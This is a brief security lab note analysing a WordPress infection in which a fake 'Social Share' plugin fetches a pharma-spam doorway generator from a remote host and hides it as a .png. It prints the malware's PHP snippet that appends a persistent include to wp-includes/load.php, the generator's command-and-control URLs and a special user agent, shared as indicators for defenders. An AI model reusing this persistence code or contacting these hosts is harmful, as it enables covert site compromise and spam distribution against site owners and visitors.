Fake Social Share WordPress Plugin Creates Pharma Spam Doorways

Labs Note

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php that calls itself WP Social Include File. It downloads doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it into wp-content/mu-plugins/mu-plugin.png and then includes this file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed using a special User Agent

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.

You May Also Like